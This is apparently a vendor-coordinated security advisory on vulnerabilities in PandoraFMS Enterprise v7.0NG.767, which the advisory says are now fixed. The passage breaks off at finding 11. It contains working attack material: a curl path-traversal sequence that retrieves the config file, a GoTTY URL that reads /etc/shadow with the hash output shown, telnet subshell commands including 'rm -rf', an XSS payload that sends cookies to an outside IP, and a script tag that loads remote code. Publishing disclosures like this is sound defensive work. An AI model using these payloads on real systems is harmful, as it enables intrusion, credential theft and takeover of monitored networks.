Introduction
This is the third Technical Advisory post in a series wherein I audit the security of popular Remote Monitoring and Management (RMM) tools. The first post in the series can be found at Multiple Vulnerabilities in Faronics Insight, the second post can be found at Multiple Vulnerabilities in Nagios XI.
In this post I describe the 18 vulnerabilities that I discovered in PandoraFMS Enterprise v7.0NG.767 available at https://pandorafms.com. PandoraFMS is an enterprise scale network monitoring and management application which provides systems administrators with a central ‘hub’ to monitor and manipulate the state of computers (agents) deployed across the network.
The PandoraFMS Console (server) boasts a large feature set which includes the ability to execute arbitrary commands on agent computers, monitor processes on agents, monitor CPU load, interact via SNMP, and enables direct SSH/telnet connections to agents via a rich, bespoke in-browser client.
During this research a number of vulnerabilities were identified in the product:
- Unauthenticated Admin Account Takeover Via Cron Log File Backups (CVE-2023-4677)
- Database Backups are Available to Any User (CVE-2023-41786)
- Remote Code Execution via MIBS file uploader (CVE-2023-41788)
- Unauthenticated Admin Account Takeover Via Malicious Agent and XSS (CVE-2023-41789)
- Arbitrary File Read As Root Via GoTTY Page (CVE-2023-41808)
- Arbitrary File Read Via API Checker (CVE-2023-41787)
- Linux Local Privilege Escalation Via GoTTY Page (CVE-2023-41807)
- Path Traversal in get_file.php (CVE-2023-41790)
- Stored Cross Site Scripting via SNMP Trap Editor Page (CVE-2023-41792)
- Stored Cross Site Scripting via Translation Abuse (CVE-2023-41791)
- Stored Cross Site Scripting via User Profile Comment Field (CVE-2023-41809)
- System Denial of Service Via GoTTY Page (CVE-2023-41806)
- Any User Can Change Any Other User’s Notification Settings (CVE-2023-41813)
- Cookies Set Without HTTP ONLY Flag (CVE-2023-41793)
- Installer installs MySQL with Weak Credentials (Not assigned)
- Stored Cross Site Scripting Via Dashboard Panel (CVE-2023-41810)
- Stored Cross Site Scripting via Site News Page (CVE-2023-41811)
- User Credentials Written To Access Log In Plaintext (CVE-2023-41794)
N.B: Despite the findings which were identified during this research, generally speaking, the security posture of the application is mature, and significant effort has been made to mitigate impactful vulnerabilities like SQL injection, IDOR and LFI. Additionally the RBAC controls are generally implemented consistently across the application, to a sufficiently granular degree.
These vulnerabilities were all mitigated across versions v773, v774 and v775 (the latest version at the time of writing).
1. Unauthenticated Admin Account Takeover Via Cron Log File Backups (CVE-2023-4677)
Risk: Critical (9.9 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L)
Impact
Successful compromise of an administrator’s account generally grants an attacker with the ability to execute arbitrary commands on all connected agents, leading to mass compromise.
Details
As part of the Pandora FMS server’s operation it periodically executes a Linux ‘cron’ job and stores logs of the job’s execution in `/var/www/html/pandora_console/logs/cron.log` by default. This log file is periodically rotated by compressing it into a gzip archive and storing it in files named cron.log.date_of_backup.gz
Pandora developers have implemented an Apache `.htaccess` file which explicitly blocks browsers from requesting the `cron.log` file, however an oversight in this `.htaccess` file enables an attacker to retrieve all backups by brute forcing the date portion of the backup filename.
Amongst other sensitive details, these cron log files contain the administrator’s session ID at the time that the cron log was written. Should an attacker successfully access a cron log file then they are able to extract admin’s session ID and connect to Pandora FMS as an administrator, taking over the admin’s account.
A small Python proof of concept script was written which automatically attempts to retrieve cron log backup files from “today’s date+1” backwards, extracts the session ID and establishes whether it’s valid or not by requesting the admin’s user profile page whilst supplying the extracted session ID.
2. Database Backups are Available to Any User (CVE-2023-41786)
Risk: High (7.7 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)
Impact
Exploitation of this vulnerability enables compromise of all connected agents, all Pandora FMS users with weak credentials and full compromise of the Pandora FMS database.
Details
The Pandora FMS server allows administrators to schedule database backups to be created on a configurable basis, this functionality is not available to low privileged users.
These backups are persisted in `/var/www/html/pandora_server/attachment/backups` with a reasonably robust naming convention (`backup_pseudorand_date_time.sql.gz`). A list of all active database backups and links to download them is available to any authenticated user at:
http://SERVER_IP/pandora_console/index.php?sec=gextensions sec2=enterprise/godmode/manage_backups Because this functionality is available to any authenticated user, including low privileged ‘read only’ users, database backup files can be downloaded by a low privileged attacker. The database backups contain a variety of interesting information including –
- Credentials for all users (MD5 hashed)
- Credentials for the internal user and API users (plaintext)
- Credentials for all deployed agent infrastructure (plaintext by default)
- Configuration details for all deployed agent infrastructure
- Configuration details for the Pandora FMS application (including numerous plaintext passwords in the `tconfig` table)
It is also noteworthy that the backup files can be downloaded directly by an unauthenticated user if they have knowledge of the database backup filenames, however due to the pseudorandom element of the name along with the additional entropy that the datetime provides it is unlikely that this will be exploited.
3. Remote Code Execution via MIBS file uploader (CVE-2023-41788)
Risk: High (7.6 CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N)
Impact
Due to the ability to read configuration files and connect directly to the database, code execution on the Pandora FMS server constitutes a complete compromise of all accounts and agents registered with the server.
Details
Pandora FMS allows administrators to upload SNMP MIBS files at “/pandora_console/index.php?sec=snmpconsole sec2=operation/snmpconsole/snmp_mib_uploader” uploaded files are persisted at “/var/www/html/pandora_console/attachment/mibs/” and are therefore accessible over HTTP by any unauthenticated user on the network.
During this vulnerability research it was observed that it is possible to upload PHP files without restriction to the SNMP MIBS uploader, and these files would become accessible at http://host/pandora_console/attachment/mibs/XYZ.php, where XYZ.php is the name of the uploaded file.
NCC Group researchers were able to abuse this flaw to upload a web shell to the server and fully compromise the Pandora FMS server.
4. Unauthenticated Admin Account Takeover Via Malicious Agent and XSS (CVE-2023-41789)
Risk: High (8.2 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
Impact
Successful compromise of an administrator’s account generally grants an attacker with the ability to execute arbitrary commands on all connected agents, leading to mass compromise.
Details
In the default Pandora FMS configuration, the mechanism for new agents to connect to the server is a very simple XML-based protocol. Agents send a large XML payload to the server containing various pieces of information about the agent host machine, and upon receipt of this payload the server will consider them to be “connected”. A legitimate agent will send XML payloads every 5 minutes by default for the server to get up-to-date information on the agent’s state.
Due to the relative simplicity of this agent connection protocol, it is possible for an attacker to create artificial “agents” by submitting arbitrary XML payloads to the server. While fuzzing the agent connection protocol, a stored Cross Site Scripting vulnerability was discovered on the ‘custom ID’ field of the agent details page, enabling an attacker to submit a malicious XML payload as an unauthenticated user and gain JavaScript execution in an administrator’s browser when the administrator next views the agent details page.
A basic proof-of-concept Python script was developed which can perform these steps automatically, sending the administrator’s session ID back to the attacker –
5. Arbitrary File Read As Root Via GoTTY Page (CVE-2023-41808)
Risk: Medium (7.1 CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)
Impact
Abuse of this flaw enables an attacker to retrieve privileged data from the host including password hashes from the “/etc/shadow” file. With enough time and computational power password hashes can sometimes be ‘cracked’ to establish what their corresponding passwords are, this could then enable a full host privilege escalation.
Details
The Pandora FMS Console deploys a bespoke webservice named GoTTY on http://localhost:8081. During this research it was observed that this acts as an SSH client, enabling Windows or Linux users on the Pandora server host to connect to arbitrary remote hosts over SSH via their web browser. This is a full and unrestricted SSH client.
The service accepts any number of URL parameters named ‘arg’ which are passed directly as command line arguments to the SSH client when it starts.
One command line argument supported by the underlying `SSH` client is the `configfile` argument (`-F`), supplying this argument along with a file path will cause SSH to attempt to read the file and, upon failing to read configuration data from the file, print the contents of the file to the user.
Because the GoTTY service runs as root, it is possible to read any protected file on the filesystem as a low privileged user. For example, simply navigating to the URL http://localhost:8081/?arg=-F arg=/etc/shadow arg=localhost, will cause the application to print the contents of the /etc/shadow file to the screen –
/etc/shadow: line 1: Bad configuration option: root:$6$e7ffqyh.8wh9zidg$cr7ufucqlcjrdv5k/y.oslcsmdhniixiuhyva9dswjhkkdsci4v6ipicbobxlz0nzyxp92fxdpksv4pfzebem.::0:99999:7:::
/etc/shadow: line 2: Bad configuration option: bin:*:19326:0:99999:7:::
/etc/shadow: line 3: Bad configuration option: daemon:*:19326:0:99999:7:::
/etc/shadow: line 4: Bad configuration option: adm:*:19326:0:99999:7:::
/etc/shadow: line 46: Bad configuration option: nginx:!!:19516::::::
/etc/shadow: line 47: Bad configuration option: apache:!!:19516::::::
/etc/shadow: line 48: Bad configuration option: mysql:!!:19516::::::
/etc/shadow: line 49: Bad configuration option: postfix:!!:19516::::::
/etc/shadow: line 50: Bad configuration option: pandora:!!:19516:0:99999:7:::
This could then be abused to attempt to brute force the root user’s password hash offline. Another example of abusing this flaw would be to steal every user’s SSH private key file by requesting `/username/.ssh/id_rsa`
This is especially concerning as no authentication or authorization are required to interact with this service in the default configuration.
This vulnerability is slightly mitigated because the service is only deployed on localhost, had the service been made available to any network adjacent users then this vulnerability would have been rated as having critical severity.
6. Arbitrary File Read Via API Checker (CVE-2023-41787)
Risk: Medium (4.4 CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)
Impact
Arbitrary file read as the Apache user enables an attacker to read every file under (at least) `/var/www/html/pandora_console` and any other file that the Apache user can read.
Details
The Pandora application exposes a page at `/pandora_console/index.php?extension_in_menu=gextensions sec=gextensions sec2=extensions/api_checker` which enables an administrator to test if a custom Pandora FMS API endpoint is responding correctly. The intention is that an administrator will supply a HTTP/HTTPS URL in the Custom URL field and the web server will make a call to the URL, printing the response.
During this vulnerability research it was observed that it is possible to supply other URL schemes in this field too, including `file://`. Supplying a Custom URL of `file:///etc/passwd` caused the web server to print the host’s passwd file to the screen.
The screenshot below demonstrates an attacker obtaining the config file using this mechanism:
This finding’s severity is significantly mitigated by the fact that this page is only available to administrative users.
7. Linux Local Privilege Escalation Via GoTTY Page (CVE-2023-41807)
Risk: Medium (9.3 CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Despite this high CVSS score, exploitation is unlikely, and as such the risk has been lowered to medium.
Impact
Privilege escalation to the root user enables an attacker to fully enumerate and compromise the server without any limitations.
Details
The Pandora FMS Console deploys a bespoke webservice named GoTTY on http://localhost:8082. During this research it was observed that this acts as a telnet client, enabling local operating system users on the Pandora server to connect to remote Telnet servers via their web browser. This is a full and unrestricted Telnet client, and as such it supports the dangerous “!” `invoke subshell` command.
Invoking a subshell allows a user to execute commands on the telnet client’s host by prepending them with the exclamation mark character (!ls, !whoami, !rm -rf /var/www). Because the GoTTY webservice runs as the root user, invoking a subshell allows anyone on localhost (or with access to localhost) to execute commands on the host as root, this constitutes a full privilege escalation on the host.
It should be noted that no authentication or authorization are required to interact with this service in the default configuration.
This vulnerability is slightly mitigated because the service is only deployed on localhost, had the service been made available to any network adjacent users then this vulnerability would have been rated as having critical severity.
8. Path Traversal in get_file.php (CVE-2023-41790)
Risk: Medium (6.3 CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N)
Impact
Exploitation of this finding enables an attacker to exfiltrate the contents of the Pandora FMS config file, potentially enabling them to fully compromise the database.
Details
`get_file.php` is a PHP script available to authenticated users. Its purpose is to serve a subset of files from the ‘file_manager’ page of the Pandora FMS Console. To prevent arbitrary file reads, the `get_file.php` script accepts two arguments –
- `file` – a base64 encoded representation of the filename to be downloaded
- `hash` – a concatenation of the `file` param and a secret key stored in the `tconfig` table of the database, the concatenated strings are base64 encoded.
The intention behind this security scheme is that an attacker shouldn’t know the `server_unique_identifier` value which is stored in the database, so they should never be able to manually request files which aren’t listed in the file manager page of the application.
Whilst researching Pandora FMS it was observed that if an attacker does become aware of the `server_unique_identifier` value, they are able to request arbitrary files. Here is an example of an attacker stealing the application’s config file by abusing path traversal –
FILE=`echo -n "../../../../../../../../var/www/html/pandora_console/include/config.inc.php" | base64 -w0`
HASH=`echo -n "$(echo $FILE)2d4db6e6061b11eea83f000c295d5470" | md5sum | cut -f1 -d' '`
URL=`echo -n "http://127.0.0.1/pandora_console/include/get_file.php?file=$FILE hash=$HASH"`
curl $URL -H 'Cookie: PHPSESSID=3l5il2emlt4j4j4v03k6g1aq0u'
<?php
/** *
* @category Config
* @package Pandora FMS
* @subpackage Community
.......... SNIP
Numerous mechanisms have been described in this package of technical advisories which could enable an attacker to ascertain the `server_unique_identifier` value (exposed database backups, weak default MySQL credentials, admin account takeover, etc.) which leads NCC Group researchers to believe that this is a credible attack vector.
9. Stored Cross Site Scripting via SNMP Trap Editor Page (CVE-2023-41792)
Risk: Medium (7.6 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:L)
Impact
Consequences of a stored Cross Site Scripting vulnerability being exploited generally range from site defacement, account takeover, CSRF, sophisticated phishing attacks.
Details
Two key flaws were identified in the Pandora FMS console. Firstly, there is an RBAC lapse on the SNMP Trap editor page which enables any authenticated user to create SNMP Trap entries (it is assumed that this is intended to be an administrator-only feature).
Secondly there is no output encoding on the OID/text/description fields in the SNMP Trap list page, leading to a situation where a low privileged attacker can create malicious SNMP Trap entries containing JavaScript code which executes whenever a victim visits the SNMP Trap list page.
10. Stored Cross Site Scripting via Translation Abuse (CVE-2023-41791)
Risk: Medium (6.5 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Impact
Consequences of a stored Cross Site Scripting vulnerability being exploited generally range from site defacement, account takeover, CSRF, sophisticated phishing attacks.
Details
The application makes a feature available to administrators which allows them to tweak the translation of various application strings so that they are more comfortable in the user’s native language.
There are two key issues here. The first issue is that the feature is erroneously accessible as a non-administrator user (this is clearly intended to be an administrative feature). The second issue is that there is insufficient filtering on the supplied translation strings, which enables stored XSS by changing the strings to JavaScript payloads.
As an example, replace the “Enter keywords to search” string (a string which renders at the top of every single page in the application) with
'test'; ?><script>var i=new Image; i.src='http://192.168.120.128:8888/?'+document.cookie;</script><>After this change is made, any time that a user navigates to any page in the application, their cookies will be exfiltrated to the IP address noted above –
11. Stored Cross Site Scripting Via User Profile Comment Field (CVE-2023-41809)
Risk: Medium (6.5 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Impact
Consequences of a stored Cross Site Scripting vulnerability being exploited generally range from site defacement, account takeover, CSRF, sophisticated phishing attacks.
Details
The application allows users to supply comments about themselves in their profile, no special permissions are required for this. A snippet of this comment is rendered to administrators in the `Users` screen at:
http://pandora_server_hostname /pandora_console/index.php?sec=gusuarios sec2=godmode/users/user_list#If the comment exceeds 24 characters in length then it is truncated to 24 characters and an ellipses is added on the end. An XSS vulnerability exists within this comments field, exploitable with a sub-24 character payload such as the following –
<script src="//nc.ci/1"></script>